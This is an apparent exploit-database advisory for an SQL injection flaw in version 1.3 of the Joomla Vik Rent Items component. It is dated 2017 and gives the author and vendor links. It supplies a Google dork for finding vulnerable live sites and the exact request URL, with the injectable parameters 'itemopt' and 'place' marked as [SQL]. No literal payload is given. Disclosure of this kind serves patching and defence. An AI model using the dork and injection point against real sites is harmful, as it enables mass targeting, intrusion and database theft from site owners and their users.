Joomla Vik Rent Items component version 1.3 suffers from a remote SQL injection vulnerability.
b5f44abbba4e6402327958ce9e9853f5
# # # # #
# Exploit Title: Joomla! Component Vik Rent Items v1.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_vikrentitems
# Date: 15.03.2017
# Vendor Homepage: https://extensionsforjoomla.com/
# Software : https://extensionsforjoomla.com/components-modules/vik-rent-items-e4j
# Demo: https://extensionsforjoomla.com/livedemo/vikrentitems/
# Version: 1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/en/?option=com_vikrentitems&task=showprc&itemopt=[SQL]&days=2&pickup=1490790600&release=1490947200&place=[SQL]&Itemid=132
# ext4joo_vikrentitemsj3demo
# Etc..
# # # # #